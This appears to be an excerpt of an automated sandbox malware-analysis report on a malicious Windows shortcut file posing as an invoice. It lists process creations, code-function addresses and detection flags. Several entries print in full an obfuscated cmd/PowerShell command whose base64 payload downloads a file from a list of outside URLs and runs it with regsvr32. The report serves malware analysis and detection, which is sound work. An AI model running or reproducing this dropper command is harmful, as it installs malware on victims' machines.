                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180015A644_2_0000000180015A64
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800152644_2_0000000180015264
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000A26C4_2_000000018000A26C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800018704_2_0000000180001870
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001F8784_2_000000018001F878
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800076784_2_0000000180007678
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001667C4_2_000000018001667C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800126804_2_0000000180012680
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800144844_2_0000000180014484
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180001E884_2_0000000180001E88
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000968C4_2_000000018000968C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800222904_2_0000000180022290
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180026A904_2_0000000180026A90
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800154944_2_0000000180015494
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000BC984_2_000000018000BC98
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000529C4_2_000000018000529C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180008C9C4_2_0000000180008C9C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180020AA04_2_0000000180020AA0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800078A44_2_00000001800078A4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001F0A84_2_000000018001F0A8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180022AAC4_2_0000000180022AAC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001E4AC4_2_000000018001E4AC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800048B04_2_00000001800048B0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001ACB44_2_000000018001ACB4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180007EB44_2_0000000180007EB4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800090B44_2_00000001800090B4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800162BC4_2_00000001800162BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800270C04_2_00000001800270C0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800024C04_2_00000001800024C0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800280C84_2_00000001800280C8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001AEC84_2_000000018001AEC8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800050D44_2_00000001800050D4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800234D84_2_00000001800234D8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001F6DC4_2_000000018001F6DC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800026DC4_2_00000001800026DC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180002ADC4_2_0000000180002ADC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002ACE84_2_000000018002ACE8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800150F04_2_00000001800150F0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001E2F44_2_000000018001E2F4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180016AF44_2_0000000180016AF4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000DEF44_2_000000018000DEF4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001DEFC4_2_000000018001DEFC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800125004_2_0000000180012500
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800063084_2_0000000180006308
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001370C4_2_000000018001370C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001A10C4_2_000000018001A10C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180028D104_2_0000000180028D10
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800201184_2_0000000180020118
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180004B184_2_0000000180004B18
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001A5244_2_000000018001A524
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180015F244_2_0000000180015F24
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000F3284_2_000000018000F328
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180002D284_2_0000000180002D28
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E1304_2_000000018000E130
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800291344_2_0000000180029134
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800081344_2_0000000180008134
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800217384_2_0000000180021738
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002AF384_2_000000018002AF38
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800221404_2_0000000180022140
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800283484_2_0000000180028348
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000DB4C4_2_000000018000DB4C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180014F504_2_0000000180014F50
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000B3504_2_000000018000B350
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800069544_2_0000000180006954
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000F5544_2_000000018000F554
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002975C4_2_000000018002975C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002B5644_2_000000018002B564
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800121684_2_0000000180012168
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800135684_2_0000000180013568
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800243704_2_0000000180024370
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800083704_2_0000000180008370
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800157744_2_0000000180015774
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800123784_2_0000000180012378
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800191784_2_0000000180019178
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800251804_2_0000000180025180
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800019804_2_0000000180001980
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800215884_2_0000000180021588
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001A9884_2_000000018001A988
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800181904_2_0000000180018190
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800139944_2_0000000180013994
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180026B984_2_0000000180026B98
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800289984_2_0000000180028998
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001CF9C4_2_000000018001CF9C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000359C4_2_000000018000359C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001EBA04_2_000000018001EBA0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800061A04_2_00000001800061A0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800135A64_2_00000001800135A6
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180016DA84_2_0000000180016DA8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800059AC4_2_00000001800059AC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000D7AC4_2_000000018000D7AC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800053B04_2_00000001800053B0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800135B44_2_00000001800135B4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001C1B84_2_000000018001C1B8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180015BB84_2_0000000180015BB8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800025B84_2_00000001800025B8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800207BC4_2_00000001800207BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800085BC4_2_00000001800085BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800015C04_2_00000001800015C0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000FFC04_2_000000018000FFC0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800295C84_2_00000001800295C8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800229CC4_2_00000001800229CC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E5D44_2_000000018000E5D4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002A5D84_2_000000018002A5D8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800173DC4_2_00000001800173DC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180018BDC4_2_0000000180018BDC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800261E04_2_00000001800261E0
                    Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FFA5246BD70 appears 113 times
                    Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FFA52467FF0 appears 31 times
                    Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FFA5246B3B0 appears 148 times
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP 4F7092CD881FC00ED017787C704C3D1B221B5B13D9A34539732BFC1EDB8261C5
                    Source: RechnungsDetails 2022.20.05_1044.lnkReversingLabs: Detection: 41%
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /v:on /c zlkGA07kqp/HVSJK6L7RjY+ay04qYhLTdlRQkqIXeTfVVJIU9NeSf/9YcHLfxyd+ETRqdB8X||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
                    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ZrCipB\RLcE.dll"
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCPJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ZrCipB\RLcE.dll"Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220523Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvcdsjdc.j3a.ps1Jump to behavior
                    Source: classification engineClassification label: mal100.troj.evad.winLNK@14/8@2/4
                    Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006F2C FindCloseChangeNotification,Process32FirstW,CreateToolhelp32Snapshot,Process32NextW,4_2_0000000180006F2C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

                    Data Obfuscation

                    barindex
                    Suspicious powershell command line found
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"Jump to behavior
                    Suspicious command line found
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe" /v:on /c zlkGA07kqp/HVSJK6L7RjY+ay04qYhLTdlRQkqIXeTfVVJIU9NeSf/9YcHLfxyd+ETRqdB8X||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}
                    Obfuscated command line found
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /v:on /c zlkGA07kqp/HVSJK6L7RjY+ay04qYhLTdlRQkqIXeTfVVJIU9NeSf/9YcHLfxyd+ETRqdB8X||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000C892 push ebp; retf 3_2_000000018000C895
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000D095 push B3B8007Eh; iretd 3_2_000000018000D09A
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000D0F3 push ebp; iretd 3_2_000000018000D0F4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180013551 push ebx; retf 3_2_0000000180013559
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000D15D push ebx; retn 0068h3_2_000000018000D15E
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000CDA8 push ebp; iretd 3_2_000000018000CDA9
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000CE36 push 458B0086h; iretd 3_2_000000018000CE3B
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180013551 push ebx; retf 4_2_0000000180013559
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA524712E3 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_00007FFA524712E3
                    Source: IKdzfJtQpj.BCP.2.drStatic PE information: real checksum: 0x654f5 should be: 0x60ea5
                    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ZrCipB\RLcE.dll"

                    Persistence and Installation Behavior

                    barindex
                    Windows shortcut file (LNK) starts blacklisted processes
                    Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCPJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCPJump to dropped file
